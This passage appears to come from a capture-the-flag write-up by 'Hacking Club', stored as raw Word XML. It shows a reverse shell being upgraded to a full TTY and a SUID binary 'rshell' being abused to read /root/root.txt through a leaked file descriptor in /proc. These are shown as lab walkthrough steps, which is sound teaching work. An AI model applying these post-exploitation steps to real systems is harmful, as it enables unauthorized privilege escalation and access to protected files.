                      <a:ext cx="5943600" cy="1687792"/>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And we have a shell =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">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438400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.30ja9k215lqy" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TTY Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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Upgrading the simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">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python -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">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Ctrl+Z</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">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stty raw -echo; fg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065">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export TERM=xterm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">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184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70" name="image20.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image20.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2184400"/>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can find the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">second flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the home directory of user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mq</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69">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209800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58" name="image22.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image22.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2209800"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gt002xcvze2a" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8o7k9mhoanyz" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Privesc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">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Searching for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">binaries, we find the binary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rshell</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6D">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146300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2146300"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is a special permission that allows other users to execute a file with the privileges of the file owner. When executing the binary, I do not see any output.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">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057400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image24.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image24.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2057400"/>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Running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the binary, we can see that it is opening the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root.txt</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71">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3022600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3022600"/>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pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.eyr8ql3pje3" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Descriptor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">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 file descriptor is a number that uniquely identifies an open file in a computer’s operating system. It describes a data resource and how that resource may be accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">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When a program requests to open a file — or another data resource such as a network socket — the kernel:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Grants access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Creates an entry in the global file table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>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Provides the software with the location of that entry.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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The descriptor is identified by a unique non-negative integer number, such as 0, 12, or 567. There is at least one file descriptor for each open file in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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On Linux, the set of open descriptors for a process can be viewed in</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/PID/fd/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, where PID is the process identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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can execute the binary and obtain the PID at the same time:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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./rshell &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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Accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/PID/fd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can see that there is a symbolic link pointing to → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/root.txt</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7D">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So we just need to run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat 3 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and retrieve the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final flag</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7E">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336800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68" name="image21.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image21.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2336800"/>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sectPr>
      <w:headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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IBM Plex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IBM Plex Sans SemiBold">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6">
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:pBdr>
        <w:top w:space="0" w:sz="0" w:val="nil"/>
        <w:left w:space="0" w:sz="0" w:val="nil"/>
        <w:bottom w:space="0" w:sz="0" w:val="nil"/>
        <w:right w:space="0" w:sz="0" w:val="nil"/>
        <w:between w:space="0" w:sz="0" w:val="nil"/>
      </w:pBdr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2026 Hacking Club | All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                                          Page </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>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7">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8">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0">
    <w:pPr>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81">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="17"/>
    <w:bookmarkEnd w:id="17"/>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-866770</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="69" name="image19.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image19.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="232221"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect"/>
                  <a:ln/>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
    <w:pPr>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.76pt;height:793.4866141732284pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-73.98425196850394pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.2459055118110236pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image3.png"/>
        </v:shape>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4">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-942970</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="49" name="image10.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image10.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
